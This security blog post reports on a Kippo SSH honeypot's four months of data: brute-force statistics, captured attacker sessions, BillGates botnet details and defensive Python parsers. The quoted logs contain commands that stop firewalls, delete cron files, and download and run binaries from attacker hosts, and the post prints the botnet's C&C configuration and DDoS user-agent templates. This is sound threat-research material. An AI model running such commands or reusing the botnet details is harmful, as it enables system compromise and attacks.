
A few months ago I decided to install a honeypot to find some new threats and to collect new malware to analyse. There are several honeypots I had in mind to try, but for now I have chosen Kippo.

From Kippo's homepage: "Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker." (To see all the features offered by this honeypot, consult Kippo's homepage.)

I will not dwell on the installation and the features Kippo offers, because this post is intended as a final report, with statistics and graphs, after months in operation. As for the configuration tips and tricks I used, here are some links that will be very helpful in building a similar setup:

My honeypot is a sort of 'fork' of the original Kippo from desaster's GitHub repo, into which I merged a number of changes to improve Kippo and to hide it: the sftp, direct-tcp, exec stdin logging, SSH algorithm update and JSON logging improvements from Michel Oosterhof's Kippo fork, all the extra commands from the kippo-extra GitHub repo, and some minor changes. On top of that I applied a few workarounds/patches to hide my Kippo honeypot from the known identification (fingerprinting) attempts.

The honeypot is located in Singapore; it was turned on on 1 September 2014 and stopped on 31 December 2014, so I collected 4 months of data. Apart from the occasional visit from someone playing with nmap, essentially all of the attacks came from one very specific botnet, on which I will spend a few words at the end of the post.

Data such as connections, downloads and command input are saved in a database and, thanks to the Kippo-Graph script from BruteForce Lab, can be viewed very comfortably in a browser.

Now let’s get into the statistics.

Honeypot activity

Success ratio

The total number of login attempts is 112467, but how many of these were successful?

Just under 4% of the logins succeeded. Why so few? Kippo only accepts the credentials listed in its data/userdb.txt, so the success ratio is simply the share of attempts that happen to hit the configured password. Let's look at the usernames and passwords used to log into SSH.

Top 10 usernames (Kippo-Graph chart)



Top 10 passwords (Kippo-Graph chart)



Top 10 user/password combos (Kippo-Graph chart)



Some strange username/password combinations were used, probably the result of a dictionary-based script run by the botnet. The most common attempt by far, 46% of the total, was root/admin; its count of 3644 is in fact very close to the number of successful logins, which is exactly what you would expect if that is the password the honeypot accepts.

Now let's look at which SSH clients were used to try to log into the honeypot.

Top 10 SSH clients

PuTTY stands out clearly. Keep in mind that the client name is whatever the attacker puts in the SSH version banner, so it is self-reported and trivially faked; as we will see below, this brute-force tool does exactly that.

Let's now analyse the human activity performed on the honeypot.

Top 10 commands

Not many sessions were used interactively by an operator (maybe they realised they were playing on a honeypot?): just 39 sessions were recorded.
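The numbers above (success ratio, top usernames, passwords and combos, client banners, connections per IP and the count of interactive sessions) all come from simple aggregations over Kippo's database. The script below is an added example, not the post's own code and not Kippo-Graph: it recreates a subset of Kippo's MySQL schema (tables sessions, clients, auth and input, with the column names from kippo/doc/sql/mysql.sql) in an in-memory SQLite database, fills it with constructed rows so it runs offline, and computes the same statistics. Only the column layout follows Kippo; every row below is made up.

```python
"""Kippo statistics straight from its database (added example; constructed data)."""
import sqlite3

# Subset of Kippo's MySQL schema (kippo/doc/sql/mysql.sql), recreated in SQLite.
SCHEMA = """
CREATE TABLE sessions (id TEXT PRIMARY KEY, starttime TEXT, endtime TEXT,
                       sensor INTEGER, ip TEXT, termsize TEXT, client INTEGER);
CREATE TABLE clients  (id INTEGER PRIMARY KEY, version TEXT);
CREATE TABLE auth     (id INTEGER PRIMARY KEY AUTOINCREMENT, session TEXT,
                       success INTEGER, username TEXT, password TEXT, timestamp TEXT);
CREATE TABLE input    (id INTEGER PRIMARY KEY AUTOINCREMENT, session TEXT,
                       timestamp TEXT, realm TEXT, success INTEGER, input TEXT);
"""

# Constructed sample rows (not real captures).
CLIENTS = [(1, "SSH-2.0-PuTTY_Release_0.63"), (2, "SSH-2.0-libssh2_1.4.2")]
SESSIONS = [  # id, starttime, endtime, sensor, ip, termsize, client
    ("s1", "2014-10-12 11:40:00", "2014-10-12 11:45:00", 1, "103.41.124.46", "80x24", 1),
    ("s2", "2014-10-12 12:00:00", "2014-10-12 12:00:05", 1, "103.41.124.46", "80x24", 1),
    ("s3", "2014-10-13 02:00:00", "2014-10-13 02:00:03", 1, "103.41.124.46", "80x24", 1),
    ("s4", "2014-10-13 02:10:00", "2014-10-13 02:10:02", 1, "103.41.124.47", "80x24", 2),
]
AUTH = [  # session, success, username, password
    ("s1", 0, "root", "1234"), ("s1", 0, "root", "password"), ("s1", 1, "root", "admin"),
    ("s2", 1, "root", "admin"),
    ("s3", 0, "admin", "admin"), ("s3", 0, "root", "root"), ("s3", 0, "root", "toor"),
    ("s4", 0, "oracle", "oracle"), ("s4", 0, "root", "123456"), ("s4", 0, "root", "admin!"),
]
INPUT = [  # only the operator in s1 typed anything
    ("s1", "2014-10-12 11:42:00", "", 0, "/etc/init.d/iptables stop"),
    ("s1", "2014-10-12 11:42:10", "", 1, "cd /tmp/"),
    ("s1", "2014-10-12 11:42:18", "", 1, "wget -c http://42.96.191.5:300/arm"),
]


def build_db():
    """In-memory stand-in for the Kippo MySQL database."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO clients VALUES (?, ?)", CLIENTS)
    db.executemany("INSERT INTO sessions VALUES (?, ?, ?, ?, ?, ?, ?)", SESSIONS)
    db.executemany("INSERT INTO auth (session, success, username, password) "
                   "VALUES (?, ?, ?, ?)", AUTH)
    db.executemany("INSERT INTO input (session, timestamp, realm, success, input) "
                   "VALUES (?, ?, ?, ?, ?)", INPUT)
    return db


def success_ratio(db):
    """(attempts, successes, fraction). Kippo only accepts the passwords in
    data/userdb.txt, so the fraction is the share of attempts hitting them."""
    total, ok = db.execute(
        "SELECT COUNT(*), COALESCE(SUM(success), 0) FROM auth").fetchone()
    return total, ok, (ok / total if total else 0.0)


def top(db, what, n=10):
    """Top-N usernames, passwords or user/pass combos as [(value, count), ...]."""
    col = {"username": "username", "password": "password",
           "combo": "username || '/' || password"}[what]
    return db.execute(f"SELECT {col}, COUNT(*) FROM auth "
                      "GROUP BY 1 ORDER BY 2 DESC, 1 LIMIT ?", (n,)).fetchall()


def top_clients(db, n=10):
    """Client banners as sent by the attacker (self-reported, trivially faked)."""
    return db.execute("SELECT c.version, COUNT(*) FROM sessions s "
                      "JOIN clients c ON s.client = c.id "
                      "GROUP BY 1 ORDER BY 2 DESC, 1 LIMIT ?", (n,)).fetchall()


def connections_per_ip(db):
    return db.execute("SELECT ip, COUNT(*) FROM sessions "
                      "GROUP BY 1 ORDER BY 2 DESC, 1").fetchall()


def interactive_sessions(db):
    """Sessions in which at least one command was typed: the 'human' ones."""
    return [row[0] for row in
            db.execute("SELECT DISTINCT session FROM input ORDER BY session")]


if __name__ == "__main__":
    db = build_db()
    print("success ratio:", success_ratio(db))
    for what in ("username", "password", "combo"):
        print("top", what, top(db, what))
    print("clients:", top_clients(db))
    print("per IP:", connections_per_ip(db))
    print("interactive:", interactive_sessions(db))
```

Against a real Kippo install, replace build_db() with a connection to the MySQL database; the queries are the same. The interactive-session count is the one Kippo-Graph derives from the input table, which is why a brute-force bot that never types anything does not show up there.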

Let's now try to understand where these connections come from.

Connections per IP (Kippo-Graph chart)



The traffic comes entirely from China, so we can make an educated guess about the origin of the botnet.

Below is the IP information (whois):





inetnum: 103.41.124.0 - 103.41.127.255

netname: HEETHAILIMITED-HK

descr: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG

country: HK

admin-c: HA259-AP

tech-c: HA259-AP

status: ALLOCATED PORTABLE

mnt-by: APNIC-HM

mnt-lower: MAINT-HEETHAILIMITED-HK

mnt-routes: MAINT-HEETHAILIMITED-HK

mnt-irt: IRT-HEETHAILIMITED-HK

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

remarks: This object can only be updated by APNIC hostmasters.

remarks: To update this object, please contact APNIC

remarks: hostmasters and include your organisation's account

remarks: name in the subject line.

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

changed: [email protected] 20141021

source: APNIC

irt: IRT-HEETHAILIMITED-HK

address: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG, hongkong KLN 999077

e-mail: [email protected]

abuse-mailbox: [email protected]

admin-c: HA259-AP

tech-c: HA259-AP

auth: # Filtered

mnt-by: MAINT-HEETHAILIMITED-HK

changed: [email protected] 20141020

source: APNIC

role: HEETHAILIMITED administrator

address: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG, hongkong KLN 999077

country: HK

phone: +855-78-585-191

fax-no: +855-78-585-191

e-mail: [email protected]

admin-c: HA259-AP

tech-c: HA259-AP

nic-hdl: HA259-AP

mnt-by: MAINT-HEETHAILIMITED-HK

changed: [email protected] 20141020

source: APNIC



The whois service tells us that the IP is located in Hong Kong, but digging deeper some more interesting information can be gathered, such as these blocklist entries:

103.41.124.46: SCAN SSH BruteForce Tool with fake PUTTY version

103.41.124.46: SSH Brute Force

Interesting, right? Yes, those are SSH brute-forcing servers.

Below are typical sessions with a human operator at the keyboard, as recorded by the honeypot. In the first one the operator keeps typing while the wget download is still in progress, which is why commands and wget progress lines are interleaved in the log.

First example:

my3:~# /etc/init.d/iptables stop

bash: /etc/init.d/iptables: command not found

my3:~# service iptables stop

bash: service: command not found

my3:~# SuSEfirewall2 stop

bash: SuSEfirewall2: command not found

my3:~# reSuSEfirewall2 stop

bash: reSuSEfirewall2: command not found

my3:~# cd /tmp/

my3:/tmp# wget -c http://42.96.191.5:300/arm

--2014-10-12 11:42:18-- http://42.96.191.5:300/arm

Connecting to 42.96.191.5:300... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1001465 (977K) [application/octet-stream]

Saving to: `arm



0% [> ] 4,356 1K/s eta 11m 9s

chmod 0755 /tmp/arm

1% [> ] 10,148 1K/s eta 8m 20s

./arm &

2% [> ] 24,628 2K/s eta 5m 34s

wget -c http://42.96.191.5:300/mips

3% [=> ] 35,028 2K/s eta 7m 12s

chmod 0755 /tmp/mips

./mips &

wget -c http://42.96.191.5:300/wrt

7% [==> ] 72,988 2K/s eta 5m 33s

chmod 0755 /tmp/wrt

./wrt &

16% [======> ] 168,844 4K/s eta 3m 8s

*** End of log! ***

Second example (note that Kippo's emulated shell cannot execute a file it has just downloaded, hence the 'command not found' for ./Syn1; this is exactly the kind of tell a careful operator uses to recognise a honeypot):



my3:~# uname -a

Linux my3 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux

my3:~# wget http://121.40.141.102:8081/Syn1

--2014-09-23 06:06:43-- http://121.40.141.102:8081/Syn1

Connecting to 121.40.141.102:8081... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1524643 (1M) [application/octet-stream]

Saving to: `Syn1



100%[======================================>] 1,524,643 125K/s



2014-09-23 06:06:55 (125 KB/s) - `Syn1' saved [1524643/1524643]

my3:~# chmod 777 Syn1

my3:~# ./Syn1

bash: ./Syn1: command not found

my3:~#

*** End of log! ***

Third example, from the SSH brute-force script (botnet). There is no human interaction here: the commands were presumably sent as exec requests rather than typed into a shell, so only their output appears in the log.



bash: /etc/init.d/iptables: command not found

rm: cannot remove `/var/spool/cron/crontabs': No such file or directory

rm: cannot remove `/var/spool/cron/crontabs': No such file or directory

--2014-09-20 06:45:51-- http://www.frade8c.com:9162/root

Connecting to www.frade8c.com:9162... connected.

HTTP request sent, awaiting response... 200 OK

Length: 187350 (182K) [application/octet-stream]

Saving to: `root



100%[======================================>] 187,350 66K/s



2014-09-20 06:45:53 (66 KB/s) - `root' saved [187350/187350]

--2014-09-20 06:45:53-- http://www.frade8c.com:9162/root

Connecting to www.frade8c.com:9162... connected.

HTTP request sent, awaiting response... 200 OK

Length: 187350 (182K) [application/octet-stream]

Saving to: `root



25% [=========> ] 47,538 12K/s eta 11s



Length: 187350 (182K) [application/octet-stream]

Saving to: `root



100%[======================================>] 187,350 66K/s



2014-09-20 06:45:53 (66 KB/s) - `root' saved [187350/187350]

--2014-09-20 06:45:53-- http://www.frade8c.com:9162/root

Connecting to www.frade8c.com:9162... connected.

HTTP request sent, awaiting response... 200 OK

Length: 187350 (182K) [application/octet-stream]

Saving to: `root



100%[======================================>] 187,350 17K/s



2014-09-20 06:46:03 (17 KB/s) - `root' saved [187350/187350]

--2014-09-20 06:46:03-- http://www.frade8c.com:9162/jdhe

Connecting to www.frade8c.com:9162... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1554782 (1M) [application/octet-stream]

Saving to: `jdhe



20% [=======> ] 313,968 71K/s eta 17s

[...]

*** End of log! ***
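The two human sessions and the bot script above follow the same playbook: try to stop the firewall, optionally wipe the cron spool, cd to /tmp, fetch a payload over HTTP from a non-standard port (one file per CPU architecture in the first example), chmod it and run it in the background. The classifier below is an added example, not code from the post or from Kippo: it takes the ordered list of commands a session issued (what Kippo keeps in its input table, or what you read off a tty log) and reports the indicators, download servers and executed files. The sample sessions are constructed from the command sequences shown in the post; the indicator names and verdict rules are mine.

```python
"""Classify Kippo sessions by the 'download and run' pattern (added example)."""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"]+")
FIREWALL_RE = re.compile(r"\b(?:iptables|SuSEfirewall2)\b.*\bstop\b|iptables\s+-F")
CRON_RE = re.compile(r"\brm\b.*\s/var/spool/cron")
CHMOD_RE = re.compile(r"^\s*chmod\s+(?:[0-7]{3,4}|[ugoa]*\+x)\s+(\S+)")
EXEC_RE = re.compile(r"^\s*(?:\./|/tmp/)(\S+?)\s*&?\s*$")
# Payload names that usually mean "one binary per architecture" (my list).
ARCH_NAMES = {"arm", "armv7", "mips", "mipsel", "x86", "x86_64", "i686", "wrt", "ppc", "sh4"}


def analyse_session(commands):
    """Return verdict, indicators and IOCs for one session's command list."""
    indicators, urls, servers, downloaded, executed = set(), [], set(), set(), []
    for cmd in commands:
        if FIREWALL_RE.search(cmd):
            indicators.add("firewall_disable")
        if CRON_RE.search(cmd):
            indicators.add("cron_cleanup")
        for url in URL_RE.findall(cmd):
            indicators.add("download")
            urls.append(url)
            p = urlparse(url)
            servers.add((p.hostname, p.port or 80))          # distribution server IOC
            downloaded.add(p.path.rsplit("/", 1)[-1])        # file name on disk
        m = CHMOD_RE.match(cmd)
        if m and m.group(1).rsplit("/", 1)[-1] in downloaded:
            indicators.add("chmod_download")
        m = EXEC_RE.match(cmd)
        if m:
            executed.append(m.group(1))
            if m.group(1) in downloaded:
                indicators.add("execute_download")
    if len(downloaded & ARCH_NAMES) >= 2:
        indicators.add("multi_arch_fanout")   # attacker does not know the CPU, tries several
    if {"download", "execute_download"} <= indicators or {"download", "chmod_download"} <= indicators:
        verdict = "dropper"
    elif "download" in indicators:
        verdict = "staging"      # fetched something but we did not see it run (or the log was cut)
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": sorted(indicators), "urls": urls,
            "servers": sorted(servers), "downloaded": sorted(downloaded), "executed": executed}


# Constructed sessions, modelled on the logs quoted in the post.
HUMAN_ARM = [
    "/etc/init.d/iptables stop", "service iptables stop", "SuSEfirewall2 stop", "cd /tmp/",
    "wget -c http://42.96.191.5:300/arm", "chmod 0755 /tmp/arm", "./arm &",
    "wget -c http://42.96.191.5:300/mips", "chmod 0755 /tmp/mips", "./mips &",
    "wget -c http://42.96.191.5:300/wrt", "chmod 0755 /tmp/wrt", "./wrt &",
]
HUMAN_SYN1 = ["uname -a", "wget http://121.40.141.102:8081/Syn1", "chmod 777 Syn1", "./Syn1"]
BOT_SCRIPT = ["/etc/init.d/iptables stop", "rm -rf /var/spool/cron/crontabs",
              "wget http://www.frade8c.com:9162/root", "wget http://www.frade8c.com:9162/jdhe"]
RECON_ONLY = ["uname -a", "cat /proc/cpuinfo", "w", "ls -la /tmp"]

if __name__ == "__main__":
    for name, session in (("arm", HUMAN_ARM), ("syn1", HUMAN_SYN1),
                          ("bot", BOT_SCRIPT), ("recon", RECON_ONLY)):
        print(name, analyse_session(session))
```

The servers field is the part worth feeding into a blocklist or a proxy log search: the distribution hosts in the post all serve from unusual ports (300, 8081, 9162), which is a cheap egress-filtering catch on a real network.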

Botnet Info

The large amount of data recorded by the honeypot refers to one very specific botnet: the BillGates botnet. I came to this conclusion after analysing the IPs and the samples captured by Kippo and after some research with Google. Here you can download the latest fresh samples captured by Kippo (30 December) (password: infected).



I uploaded just one copy of each file, since there were a lot of duplicates. See below:

I preferred not to publish any file analysis because there is enough information online; in particular, the Kernelmode forum has very interesting information and links, the same information I found by analysing the various modules. The only things that vary are the C&C IP address, obviously (dead at the moment), and some minor code changes. Some modules were packed with UPX, so I have already unpacked them. These are the botnet's modules (originally named atddd and cupsdd(h); the names usually differ from version to version).



Below is some info gathered from the botnet's main module, cupsdd(h):

The configuration string, decrypted with the RSA routine, is:

v9.jack52088.com:5168:1:1: :1:698412:697896:697380

which, after splitting on ':', is assigned to these parameters:

g_strConnTgts = v9.jack52088.com (61.174.48.17) - C&C IP address

g_iGatsPort = 5168 - C&C server's port

g_iGatsIsFx =1

g_iIsService =1

g_strForceNote =

g_bDoBackdoor =1

g_strCryptStart = 698412

g_strDStart = 697896

g_strNStart = 697380



Here C&C Server information: Link

Attack vectors (the C++ class names as they appear in the binary's RTTI, length-prefixed as in Itanium C++ ABI name mangling; e.g. 10CAttackSyn is the 10-character name CAttackSyn):



11CAttackBase

13CPacketAttack

10CAttackUdp

10CAttackSyn

11CAttackIcmp

10CAttackDns

10CAttackAmp

10CAttackPrx

15CAttackCompress

10CTcpAttack

9CAttackCc

9CAttackIe



User-agent templates used (|S| and |D&lo&hi| are apparently placeholders filled in at runtime, the latter with a number in the given range):

Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17

Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0

Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|
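Two small parsers for the string formats quoted above, as an added example that is not code from the post or from the malware. parse_config() splits the decrypted configuration string into the parameter names listed above and validates the C&C port. The user-agent helpers treat |S| as a platform placeholder and |D&lo&hi| as a random integer in [lo, hi]; that is my reading of the templates, not something the post states. Beyond the post, template_to_matcher() turns each template into a checker you can run over web-server logs to spot the CC/IE flood traffic these user-agents are generated for (with the caveat that the Firefox template has no random part and is indistinguishable from a real Firefox 18). All inputs are constructed.

```python
"""Parsers for the BillGates config string and user-agent templates (added example)."""
import random
import re

# Parameter names exactly as listed in the post, in config-string order.
CONFIG_FIELDS = ("g_strConnTgts", "g_iGatsPort", "g_iGatsIsFx", "g_iIsService",
                 "g_strForceNote", "g_bDoBackdoor", "g_strCryptStart",
                 "g_strDStart", "g_strNStart")


def parse_config(decrypted):
    """Map the ':'-separated decrypted config string onto the module's globals."""
    parts = decrypted.split(":")
    if len(parts) != len(CONFIG_FIELDS):
        raise ValueError(f"expected {len(CONFIG_FIELDS)} fields, got {len(parts)}")
    cfg = dict(zip(CONFIG_FIELDS, (p.strip() for p in parts)))
    port = int(cfg["g_iGatsPort"])
    if not 1 <= port <= 65535:
        raise ValueError(f"bad C&C port {port}")
    cfg["g_iGatsPort"] = port
    for flag in ("g_iGatsIsFx", "g_iIsService", "g_bDoBackdoor"):
        cfg[flag] = int(cfg[flag])
    return cfg            # the three *Start fields stay as strings, as the post shows them


UA_TEMPLATES = [  # copied from the post
    "Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) "
    "Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17",
    "Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0",
    "Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|",
]
TOKEN_RE = re.compile(r"\|S\||\|D&(\d+)&(\d+)\|")


def render_ua(template, rng, platform="Windows NT 6.1"):
    """Fill a template the way I assume the bot does: |S| -> platform string,
    |D&lo&hi| -> random integer in [lo, hi]."""
    def fill(m):
        if m.group(0) == "|S|":
            return platform
        return str(rng.randint(int(m.group(1)), int(m.group(2))))
    return TOKEN_RE.sub(fill, template)


def template_to_matcher(template):
    """Compile a template into (anchored regex, per-group numeric ranges)."""
    pattern, ranges, pos = "", [], 0
    for m in TOKEN_RE.finditer(template):
        pattern += re.escape(template[pos:m.start()])
        if m.group(0) == "|S|":
            pattern += r"(.+?)"
            ranges.append(None)
        else:
            pattern += r"(\d+)"
            ranges.append((int(m.group(1)), int(m.group(2))))
        pos = m.end()
    pattern += re.escape(template[pos:])
    return re.compile("^" + pattern + "$"), ranges


def matches_template(user_agent, template):
    """True if the UA fits the template and every number is inside its range."""
    regex, ranges = template_to_matcher(template)
    m = regex.match(user_agent)
    if not m:
        return False
    return all(r is None or r[0] <= int(g) <= r[1] for g, r in zip(m.groups(), ranges))


def matching_templates(user_agent):
    """Indexes into UA_TEMPLATES that a log line's user-agent matches."""
    return [i for i, t in enumerate(UA_TEMPLATES) if matches_template(user_agent, t)]


if __name__ == "__main__":
    print(parse_config("v9.jack52088.com:5168:1:1: :1:698412:697896:697380"))
    rng = random.Random(1)
    for t in UA_TEMPLATES:
        ua = render_ua(t, rng)
        print(ua, "->", matching_templates(ua))
```

The range check matters more than the regex: a real Chrome 24 of that era would also fit the Chrome template, so the numeric ranges are what separate "plausible at the time" from "generated by this bot" only when the traffic also shows the flood behaviour; treat a match as a hint, not a verdict.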

IPs hardcoded for the DNS amplification attack: here (too long to include inline).

Source files of the project:

crtstuff.c

AmpResource.cpp

Attack.cpp

CmdMsg.cpp

ConfigDoing.cpp

DNSCache.cpp

ExChange.cpp

Global.cpp

Main.cpp

Manager.cpp

MiniHttpHelper.cpp

ProtocolUtil.cpp

ProvinceDns.cpp

StatBase.cpp

SysTool.cpp

ThreadAtk.cpp

ThreadClientStatus.cpp

ThreadConnection.cpp

ThreadFakeDetect.cpp

ThreadHttpGet.cpp

ThreadLoopCmd.cpp

ThreadMonGates.cpp

ThreadRecycle.cpp

ThreadShell.cpp

ThreadShellRecycle.cpp

ThreadTask.cpp

ThreadUpdate.cpp

UserAgent.cpp

AutoLock.cpp

BigInt.cpp

FileOp.cpp

Log.cpp

Media.cpp

NetBase.cpp

RSA.cpp

ThreadCondition.cpp

Thread.cpp

ThreadMutex.cpp

Utility.cpp

WinDefSVC.cpp

To track this botnet you can use BillGates Botnet Tracker developed by the discoverer of the botnet itself.

That's all after 4 months of Kippo honeypotting. I will continue to collect data and set up new honeypots, and I will come back with updated findings.

Antelox